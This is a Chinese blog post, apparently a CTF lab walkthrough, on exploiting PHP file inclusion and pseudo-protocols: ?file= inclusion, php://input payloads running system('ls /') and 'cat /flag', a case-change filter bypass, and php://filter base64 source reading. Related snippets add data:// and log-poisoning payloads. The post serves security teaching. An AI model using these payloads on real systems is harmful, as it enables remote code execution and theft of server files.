文件包含&php伪协议

最新推荐文章于 2025-05-26 15:03:21 发布
最新推荐文章于 2025-05-26 15:03:21 发布
阅读量1.1k 收藏 10
点赞数 11
CC 4.0 BY-SA版权
文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Xiiaogu/article/details/134984977
文章讲述了在IT安全背景下,如何利用PHP的文件包含漏洞(如本地文件包含、远程文件包含)以及伪协议(php://input和php://filter)来查找和获取flag。方法包括使用Hackbar、蚁剑工具,以及通过抓包、str_replace和base64编码技巧来绕过安全限制。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

一、本地文件包含

法一:

点进去后使用Hackbar,用密码查找目录下文件(在地址上加?file=)

查到两个文件,没有flag

返回根目录下查找,输入ls /  (中间有空格)

找到好多文件,其中有flag

输入以下指令直接找flag

得到flag。

法二:蚁剑

右键添加数据,地址中加?file=,密码为ctfhub

添加完数据后打开终端,查找目录下文件,输入ls,没有flag

返回查找根目录,输入ls /,里边有flag文件

输入cat /flag查找flag

二、远程文件包含

PHP的配置文件php.ini里allow_url_fopen和allow_url_include为ON

改变请求方法为post可在下方请求数据。使用伪协议,输入?file=php://input,下方随便输,发现出现在右侧

输入<?php system('ls');?>找到俩文件

输入<?php system('ls /');?>找到flag文件

输入<?php system('cat /flag');?>找到flag

三、php://input 伪协议

题一:

抓包,在上方输入?file=php://input,下方输入<?php system('ls')?>查看目录下文件(因为用了伪协议所以GET传参也能用)

没有flag,再输入<?php system('ls /')?>查根目录

有一个很像flag,输入<?php system('cat /flag_11490')?>查看(用原文件名),找到了

题二:

框中长语句表示php://会被绕过,while循环限制了pphphp这种写法也不可用

str_replace可使用改变字母大小写的方式进行替换,注意将file改为page,然后在下方查找目录下文件

这个有点像

输入<?php system('cat fl4gisisish3r3.php')?>  (在目录下就不用/了)

四、php://filter 伪协议(读文件)

将文件进行base64编码再读出,即在file=后,flag前加上php://filter/read=convert.base64-encode/resource=

得到一串base64编码

将其复制到Burp中进行解码,得到flag

本题已给flag文件,直接过滤即可

php文件包含 伪协议
m0_64361111的博客
02-28 1196
PHP有很多内置 URL风格的封装协议,这类协议与fopen()、 copy()、 file_exists()和filesize()的文件系统函数所提供的功能类似。 zip:// 伪协议 先将要执行的PHP代码写好文件名为test.txt,将test.txt进行zip压缩,压缩文件名为test.zip,如果可以上传zip文件便直接上传,若不能便将test.zip重命名为test.jpg后再上传 在网站根目录创建1.txt,内容为 压缩,压缩后在浏览器访问 php://input ..
文件包含PHP伪协议学习笔记
2302_80935968的博客
03-22 1294
1.当allow_url_fopen=Off和allow_url_include=Off或allow_url_fopen=Off和allow_url_include=On时,文件包含失败。data:// 同样类似与php://input,可以让用户来控制输入流,当它与包含函数结合时,用户输入的data://流会被当作php文件执行。2.当allow_url_fopen=On和allow_url_include=On时,include等其他包含函数才会将URL代表的文件包含执行,文件包含成功。
include文件包含+php伪协议漏洞理解
最新发布
qq_74035288的博客
05-26 404
摘要:本文分析了PHP中include函数和伪协议的安全风险。include函数会根据文件类型执行或显示内容,支持路径遍历。PHP伪协议data://允许直接执行逗号后的代码,绕过类型检查。当include与data伪协议结合时(如include('data://text/plain,<?php system("id");?>')),攻击者可执行任意代码,危害极大。这种组合利用方式具有很高的危险性。
文件包含时涉及PHP伪协议总结
qq_43256965的博客
05-14 1712
在做CTF题的时候文件包含题出现多次使用伪协议,学习了下伪协议就顺便写个博客防止以后忘记PHP伪协议总结温故而知新,宁静以致远。
文件包含漏洞+php伪协议
unexpectedthing的博客
11-11 8063
文章目录常见的文件包含函数基本绕过:利用php伪协议1.php://input2.php://filter3.data协议4.zip协议5.bzip2://协议6.zlib://协议7. phar://协议8..file协议日志包含介绍利用条件漏洞利用流程日志文件路径远程文件包含条件流程PHPSESSION包含包含/proc/self/environ文件包含临时文件过程包含上传文件绕过类型指定后缀绕过利用长度截断%00截断url指定前缀截断目录遍历编码参考文献 常见的文件包含函数 php文件包含函数有下面四
文件包含中的伪协议
My笔记的博客
05-15 1863
php.ini 中的两个重要选项 PHP 中几个比较重要的伪协议php://input 协议还可以用来生成一句话木马,这里假设我们用的之前的直接包含的php代码: 这是一个文件上传的页面可以上传一个文件上去 上传后发现失败了,那就说明不是文件上传的题目,我们在url地址栏发现了一个op参数和一个key参数,我们用文件审查查看一下源代码 点开后,看到一个op的参数,看到这个好参数我们会想到可能存在文件包含,比如我们改成upload 就变成了上传文件的页面,这里我们可以猜到通过op的参数包含不同的文件
文件包含&PHP伪协议利用
技术超强的网络安全平台
11-20 6238
文件包含&PHP伪协议利用 相关函数 要想成功利用文件包含漏洞进行攻击,需要满足以下两个条件: 1、Web应用采用include()等文件包含函数通过动态变量的方式引入需要包含的文件; 2、用户能够控制该动态变量。 php中引发文件包含漏洞的通常是以下四个函数: (1) Require: 找不到被包含的文件时会产生致命错误(E_COMPILE_ERROR),并停止脚本,如果在包含的过程中有错,比如文件不存在等,则会直接退出,不执行后续语句。; (2) Require_once:与 include 类
42、WEB攻防——通用漏洞&文件包含&LFI&RFI&伪协议编码算法&代码审计
qq_55202378的博客
02-05 1456
关于session,只要你与一个网站建立连接,网站某个文件夹下就会产生session文件,关闭浏览器或者过了一段时间,session就会失效,再次建立连接的话就会产生新的session文件。**注意被包含的文件中只要存在php代码,就可以被php解释器解析,不受文件后缀名的影响。默认是开启的,这个东西一旦开启,就是说当文件上传结束后,php将会立即清空对应session文件中的内容。生成一个session文件,session文件的文件内容就是。除此之外,不同的协议,需要开不同的开关。
php伪协议 文件包含,文件包含漏洞(伪协议利用)
weixin_33166692的博客
03-30 1136
实验环境1.已经配置好的WEB服务器2.文件包含页面include.php:文件包含phpinfo(); //一些伪协议的使用需要关注 allow_url_include 和 allow_url_fopen的状态include($_GET['f']);?>3.伪协议利用file伪协议,通过这个协议可以对系统中的文件进行包含,不过一定要是绝对路径1-1php伪协议,有两种类型 input 和 ...
WEB入门——文件包含漏洞与PHP伪协议
HasntStartIsOver的博客
06-04 1119
在程序员开发过程中,通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,无需在此编写,这种调用文件的过程一般被称为文件包含。随着网站业务的需求,程序开发人员一般希望代码更灵活,所以将被包含的文件设置为变量,用来进行动态调用,但是正是这种灵活性通过动态变量的方式引入需要包含的文件时,用户对这个变量可控而且服务端又没有做合理的校检或者校检被绕过就造成了文件包含漏洞。
PHP伪协议-文件包含漏洞常用的伪协议
热门推荐
wangyuxiang946的博客
08-19 1万+
在实战中文件包含漏洞配合PHP伪协议可以发挥重大的作用,比如读取文件源码,任意命令执行或者开启后门获取webshell等,常用的伪协议php://filter 读取文件源码 php://input 任意代码执行 data://text/plain 任意代码执行 zip:// 配合文件上传开启后门 下面拿ctf.show WEB模块的第3关举个栗子,这一关存在文件包含漏洞 php://filter php://filter 协议可以对打开的数据流进行筛选和过滤,常用于读取文件..
PHP伪协议精讲(文件包含漏洞)
2301_76251460的博客
07-21 1075
PHP伪协议
文件包含&PHP伪协议
LztCode
11-24 221
文件包含漏洞的常见利用 思路:URL传一句话进去(bp抓包),文件包含日志文件执行 http://127.0.0.1/include.php?file=../Apache/logs/access.log&666=phpinfo(); //要使用php里面的功能就必须传一个参数进去 PHP伪协议 http://127.0.0.1/include.php?file=file://c:/Windows/win.ini 路径必须是绝对路径 php://filter读写文件(查账号密码) http://1
PHP-伪协议
摘星怪sec的blog
04-25 8427
常用的伪协议有就可以利用使用文件包含函数包含文件时,文件中的代码会被执行,如果想要读取文件源码,可以使用对文件内容进行编码,编码后的文件内容不会被执行,而是展示在页面中,我们将页面中的内容使用解码,就可以获取文件的源码了。
php伪协议文件包含
bring_coco的博客
05-14 3452
再说明一下,include()函数对文件后缀名无要求,而对其中的语法有要求,即使后缀名为txt,jpg也会被当做php文件解析,只要文件内是<?如果想要读取运行php文件的源码,可以先base64编码,再传入include函数,这样就不会被认为是php文件,不会执行,会输出文件的base64编码,再解码即可。命令:file://E:/phpStudy/PHPTutorial/WWW/DVWA-master/vulnerabilities/fi/2.txt。若采用rot13编码,对php文件中的<?
php伪协议 文件包含(一)
weixin_51692662的博客
10-14 652
文件包含php伪协议
PHP伪协议文件包含漏洞
z1moq的博客
08-26 388
文件包含漏洞 为了更好的使用代码的复用性,可以使用文件包含函数将文件包含进来,直接使用文件中的代码。但这就产生了文件包含漏洞,产生原因实在通过 PHP 的函数引入文件时,为了灵活包含文件会将被包含文件设置为变量,通过动态变量来引入需要包含的文件。此时如果用户对变量可控,二服务器端卫队变量进行合理的校验或者校验被绕过,就会导致文件包含漏洞 文件包含所用的函数 函数 功能 include() 代码执行到 include() 函数时将执行文件中的 PHP代码 include_once() 当重
CTF fuzz 文件包含 php伪协议
baynk的博客
03-22 1386
一开始就需要fuzz。 先随意构造两个参数,丢到burpsuite中,构造两个是因为跑得快些。。。 这里模式记得换下,用Pitchfork,fuzz的地方也不要用错了。 第一个payload值。 第二个payload值 gogogo等结果吧。 路径应该是path了。。。 确实是OK的,那这里用php伪协议来找文件路径了。 本来想用php://input读目录文件的,但是好像有点问题,所...
php文件包含伪协议
2302_81650222的博客
03-20 313
PHP伪协议是一种在PHP中用于快速读取文件或访问资源的特殊协议。它通常以file://php://zlib://data://等形式出现,允许开发者通过简单的语法直接操作文件或数据流,而无需复杂的文件操作函数。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值